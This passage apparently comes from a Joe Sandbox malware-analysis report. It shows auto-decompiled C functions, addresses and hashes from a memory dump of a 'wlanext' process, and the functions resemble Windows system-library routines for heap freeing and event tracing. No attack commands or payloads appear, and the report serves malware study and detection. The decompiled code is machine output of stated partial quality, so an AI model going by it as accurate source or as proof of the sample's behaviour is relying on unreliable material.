                                  0x00000000
                                  0x03543766
                                  0x03543768
                                  0x035437a3
                                  0x035437a3
                                  0x035437a5
                                  0x035437a7
                                  0x035437ad
                                  0x035437b0
                                  0x035437b2
                                  0x035437bc
                                  0x035437c2
                                  0x035437c2
                                  0x035437b2
                                  0x034e9187
                                  0x034e9187
                                  0x034e918a
                                  0x034e918d
                                  0x034e918f
                                  0x034e9192
                                  0x034e9195
                                  0x00000000
                                  0x034e9195
                                  0x00000000
                                  0x0354376a
                                  0x0354376a
                                  0x0354376a
                                  0x0354376c
                                  0x0354376c
                                  0x0354376f
                                  0x03543775
                                  0x00000000
                                  0x00000000
                                  0x03543777
                                  0x03543779
                                  0x03543782
                                  0x03543787
                                  0x03543789
                                  0x03543790
                                  0x03543790
                                  0x0354378b
                                  0x0354378b
                                  0x0354378b
                                  0x03543792
                                  0x03543795
                                  0x00000000
                                  0x03543795
                                  0x00000000
                                  0x03543779
                                  0x03543798
                                  0x00000000
                                  0x03543798
                                  0x00000000
                                  0x03543768
                                  0x0354379b
                                  0x0354379b
                                  0x03543751
                                  0x03543749
                                  0x00000000
                                  0x03543740
                                  0x034e91a0
                                  0x034e91a3
                                  0x034e91a9
                                  0x034e91b0
                                  0x00000000
                                  0x034e91b0
                                  0x034e9187
                                  0x034e91b4
                                  0x034e91b4
                                  0x034e91bb
                                  0x034e91c0
                                  0x034e91c5
                                  0x034e91c7
                                  0x035437da
                                  0x034e91cd
                                  0x034e91cd
                                  0x034e91cd
                                  0x034e91d2
                                  0x034e91d5
                                  0x034e9239
                                  0x034e9239
                                  0x034e91d7
                                  0x034e91db
                                  0x034e91e1
                                  0x034e91e7
                                  0x034e91fd
                                  0x034e9203
                                  0x034e921e
                                  0x034e9223
                                  0x00000000
                                  0x034e9205
                                  0x034e9205
                                  0x034e9208
                                  0x034e920c
                                  0x034e9214
                                  0x034e9214
                                  0x034e920c
                                  0x034e91e9
                                  0x034e91e9
                                  0x034e91ee
                                  0x034e91f3
                                  0x034e91f3
                                  0x034e91f3
                                  0x034e91e7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034e9134
                                  0x034e9125
                                  0x034e911d
                                  0x034e914e
                                  0x034e90d1
                                  0x034e90d1
                                  0x034e90d3
                                  0x034e90d6
                                  0x034e90d8
                                  0x00000000
                                  0x034e90d8
                                  0x034e90cf

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21da9f35cc42251846190643beb55dfadc6bc52e445160815913a10d9455f26e
                                  • Instruction ID: aeba008b5035a4987c9390a3c98abf2c41431b66d3ffb2013ceebad240c3f493
                                  • Opcode Fuzzy Hash: 21da9f35cc42251846190643beb55dfadc6bc52e445160815913a10d9455f26e
                                  • Instruction Fuzzy Hash: 5201D1726012059FC325DF08D840B12BBE9EB82322F294467E201CFBA1D378DC41CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0357C450 Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E0357C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03529910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E035295B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E035295D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E035295D0();
				return L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                  0x0357c458
                                  0x0357c45d
                                  0x0357c466
                                  0x0357c468
                                  0x0357c469
                                  0x0357c46a
                                  0x0357c46b
                                  0x0357c46e
                                  0x0357c46f
                                  0x0357c471
                                  0x0357c476
                                  0x0357c476
                                  0x0357c47c
                                  0x0357c47e
                                  0x0357c480
                                  0x0357c480
                                  0x0357c483
                                  0x0357c484
                                  0x0357c486
                                  0x0357c488
                                  0x0357c48f
                                  0x0357c491
                                  0x0357c493
                                  0x0357c493
                                  0x0357c48f
                                  0x0357c498
                                  0x0357c49e
                                  0x0357c4ad
                                  0x0357c4ad
                                  0x0357c4b2
                                  0x0357c4b4
                                  0x0357c4cd

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                  • Instruction ID: 3d2eb411e9485995d58d0dd3029caef3ea723e118157d9e73932e932d40ceabd
                                  • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                  • Instruction Fuzzy Hash: CD019276240616BFD721EF65EC80E62FB7EFF95391F044525F1144A6B0CB22ACA1CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B4015 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E035B4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E03502280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E03502280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x35d86ac);
					E034EF900(0x35d86d4, _t28);
					E034FFFB0(0x35d86ac, _t28, 0x35d86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E034FFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                  0x035b401a
                                  0x035b401e
                                  0x035b4023
                                  0x035b4028
                                  0x035b4029
                                  0x035b402b
                                  0x035b402f
                                  0x035b4043
                                  0x035b4046
                                  0x035b4051
                                  0x035b4057
                                  0x035b405f
                                  0x035b4062
                                  0x035b4067
                                  0x035b406f
                                  0x035b407c
                                  0x035b407c
                                  0x035b408c
                                  0x035b408c
                                  0x035b4097

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1b349685c3a65a3be32549c168910d2e9e0427c667f867883ff854a01be5b595
                                  • Instruction ID: 12dbb7ef8c2830b7eb7bc68aa24531b5fc4c422875db10188111e00a9251da4b
                                  • Opcode Fuzzy Hash: 1b349685c3a65a3be32549c168910d2e9e0427c667f867883ff854a01be5b595
                                  • Instruction Fuzzy Hash: DE01AC7520164A7FC221EB79DD84E57B7BCFF85660B04021AF5088BA61CB25EC11C6E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035A138A Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E035A138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x35dd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0352FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E03507D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0352B640(E03529AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                  0x035a138a
                                  0x035a138a
                                  0x035a1399
                                  0x035a13a3
                                  0x035a13a8
                                  0x035a13aa
                                  0x035a13b5
                                  0x035a13bb
                                  0x035a13c3
                                  0x035a13c6
                                  0x035a13c9
                                  0x035a13d4
                                  0x035a13e6
                                  0x035a13d6
                                  0x035a13df
                                  0x035a13df
                                  0x035a13f1
                                  0x035a13f2
                                  0x035a13f4
                                  0x035a13f9
                                  0x035a140e

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f7650bd63d0c798a7e79334a8e95e3d405d7b700a3d5ac47b014fb21bf39a037
                                  • Instruction ID: 32de82133aae818766206c7c7a2e1f8d0131ac9595e71481d8787c921b4f2a24
                                  • Opcode Fuzzy Hash: f7650bd63d0c798a7e79334a8e95e3d405d7b700a3d5ac47b014fb21bf39a037
                                  • Instruction Fuzzy Hash: 49019275A00718AFCB10DFA9E842EAEBBB8FF85700F004066B900EB390D6709A01C794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035A14FB Relevance: .0, Instructions: 48COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E035A14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x35dd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0352FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E03507D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0352B640(E03529AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                  0x035a14fb
                                  0x035a14fb
                                  0x035a150a
                                  0x035a1514
                                  0x035a1519
                                  0x035a151b
                                  0x035a1526
                                  0x035a152c
                                  0x035a1534
                                  0x035a1537
                                  0x035a153a
                                  0x035a1545
                                  0x035a1557
                                  0x035a1547
                                  0x035a1550
                                  0x035a1550
                                  0x035a1562
                                  0x035a1563
                                  0x035a1565
                                  0x035a156a
                                  0x035a157f

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38fd397e224b896db65871be2905925da03565bd2aaf34dcd347f400f12417a0
                                  • Instruction ID: 0c2e4f1ad0011e2b5351eb5e376a3e982aa05bf2b06888a474cec03ae302051e
                                  • Opcode Fuzzy Hash: 38fd397e224b896db65871be2905925da03565bd2aaf34dcd347f400f12417a0
                                  • Instruction Fuzzy Hash: EC019275A01358AFCB10DF68E842EAEBBB8FF85710F004066F915EB390D670DA00CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034E58EC Relevance: .0, Instructions: 47COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E034E58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x35dd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x34c5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E034E5943() != 0 &&  *0x35d5320 > 5) {
					E03567B5E( &_v44, _t27);
					_t22 =  &_v28;
					E03567B5E( &_v28, _t28);
					_t11 = E03567B9C(0x35d5320, 0x34cbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0352B640(_t11, _t17, _v8 ^ _t29, 0x34cbf15, _t27, _t28);
			}















                                  0x034e58fb
                                  0x034e58fe
                                  0x034e5906
                                  0x034e590a
                                  0x034e593c
                                  0x034e593c
                                  0x034e590c
                                  0x034e590c
                                  0x034e5911
                                  0x00000000
                                  0x034e5913
                                  0x034e5913
                                  0x034e5913
                                  0x034e5911
                                  0x034e591d
                                  0x03541035
                                  0x0354103c
                                  0x0354103f
                                  0x03541056
                                  0x03541056
                                  0x034e593b

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2677a6949d3d999c6dc591f8912dd3a73ab25f5d6b406096d7644596f883622
                                  • Instruction ID: 6fd7bdcdc7c3c48a526281e89be98891b22c532540c4072c622f86917580e491
                                  • Opcode Fuzzy Hash: a2677a6949d3d999c6dc591f8912dd3a73ab25f5d6b406096d7644596f883622
                                  • Instruction Fuzzy Hash: 8301AC356006099BC714EE65E8009FFB7B8FF86125F5501AE99059F764EF30DD06CA54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B1074 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E035B1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E035B165E(__ebx, 0x35d8ae4, (__edx -  *0x35d8b04 >> 0x14) + (__edx -  *0x35d8b04 >> 0x14), __edi, __ecx, (__edx -  *0x35d8b04 >> 0x14) + (__edx -  *0x35d8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E035AAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E03507D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0359FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                  0x035b1074
                                  0x035b1080
                                  0x035b1082
                                  0x035b108a
                                  0x035b108f
                                  0x035b1093
                                  0x035b10ab
                                  0x035b10ab
                                  0x035b10c3
                                  0x035b10cf
                                  0x035b10e1
                                  0x035b10d1
                                  0x035b10da
                                  0x035b10da
                                  0x035b10e9
                                  0x035b10f5
                                  0x035b10f5
                                  0x035b10fe

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 23d692383736dd3f4de01e2d8661c44b6c9a78931d7d15646615ea2a45d6d122
                                  • Instruction ID: d118afcd2f730bf2723edd224153d1546cc9e9642b721bd94b3b39dee1fef835
                                  • Opcode Fuzzy Hash: 23d692383736dd3f4de01e2d8661c44b6c9a78931d7d15646615ea2a45d6d122
                                  • Instruction Fuzzy Hash: 56014C76604B469FC751EF29E940F5AB7F5BBC4310F048529F885876B0DE30D640CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034FB02A Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E034FB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E03507D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E03567016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                  0x034fb037
                                  0x034fb039
                                  0x034fb03b
                                  0x034fb040
                                  0x0354a60e
                                  0x00000000
                                  0x00000000
                                  0x0354a61d
                                  0x034fb04b
                                  0x034fb04e
                                  0x0354a627
                                  0x0354a634
                                  0x00000000
                                  0x00000000
                                  0x0354a641
                                  0x0354a653
                                  0x0354a643
                                  0x0354a64c
                                  0x0354a64c
                                  0x0354a65b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0354a66c
                                  0x034fb057
                                  0x034fb057
                                  0x034fb057
                                  0x034fb046
                                  0x034fb046
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                  • Instruction ID: 36aba1df22f82f1915870c04543bee5f7cd1db643b1f118789a5bca4e9e22625
                                  • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                  • Instruction Fuzzy Hash: 2A015E72644A809FD326C75CD944F6677ECEB46654F0D40A2AA19CB661D628DC40C664
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0359FE3F Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E0359FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x35dd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0352FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E03507D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0352B640(E03529AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                  0x0359fe3f
                                  0x0359fe3f
                                  0x0359fe4e
                                  0x0359fe58
                                  0x0359fe5d
                                  0x0359fe5f
                                  0x0359fe6a
                                  0x0359fe72
                                  0x0359fe75
                                  0x0359fe78
                                  0x0359fe83
                                  0x0359fe95
                                  0x0359fe85
                                  0x0359fe8e
                                  0x0359fe8e
                                  0x0359fea0
                                  0x0359fea1
                                  0x0359fea3
                                  0x0359fea8
                                  0x0359febd

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb933b28dfbac9a9d16845d6e42d8d76dec01a624b5d2110119e99515cf6c5fd
                                  • Instruction ID: 5f2c0ebe5dc8164dac60713567430b7a3472fe77d22f77af0e7763b69010dedb
                                  • Opcode Fuzzy Hash: fb933b28dfbac9a9d16845d6e42d8d76dec01a624b5d2110119e99515cf6c5fd
                                  • Instruction Fuzzy Hash: E701D475A00319AFDB14DFA8E802FAEBBB8FF85700F004066B900EB3A0DA309901C794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0359FEC0 Relevance: .0, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E0359FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x35dd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0352FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E03507D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0352B640(E03529AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                  0x0359fec0
                                  0x0359fec0
                                  0x0359fecf
                                  0x0359fed9
                                  0x0359fede
                                  0x0359fee0
                                  0x0359feeb
                                  0x0359fef3
                                  0x0359fef6
                                  0x0359fef9
                                  0x0359ff04
                                  0x0359ff16
                                  0x0359ff06
                                  0x0359ff0f
                                  0x0359ff0f
                                  0x0359ff21
                                  0x0359ff22
                                  0x0359ff24
                                  0x0359ff29
                                  0x0359ff3e

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b69b1c9559c577a4abc142e7cffbf796978be883e3ba7a4cb1a3d156e22919bc
                                  • Instruction ID: d699067e28666fea521a5c2de462f59628af09b3728bb43ec3c84943b4faae55
                                  • Opcode Fuzzy Hash: b69b1c9559c577a4abc142e7cffbf796978be883e3ba7a4cb1a3d156e22919bc
                                  • Instruction Fuzzy Hash: FC018875A01319AFDB14DB69E845FAEBBB8FF85700F004066B901DB390DA719911C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B8A62 Relevance: .0, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 54%
                                  			E035B8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x35dd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E03507D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0352B640(E03529AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                  0x035b8a62
                                  0x035b8a71
                                  0x035b8a79
                                  0x035b8a82
                                  0x035b8a85
                                  0x035b8a89
                                  0x035b8a8c
                                  0x035b8a8f
                                  0x035b8a92
                                  0x035b8a95
                                  0x035b8a9f
                                  0x035b8ab1
                                  0x035b8aa1
                                  0x035b8aaa
                                  0x035b8aaa
                                  0x035b8abc
                                  0x035b8abd
                                  0x035b8abf
                                  0x035b8ac4
                                  0x035b8ada

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7ab813b6377030859a89ac1e8845277f293b5dd8c71740a1233a855d45d8a35
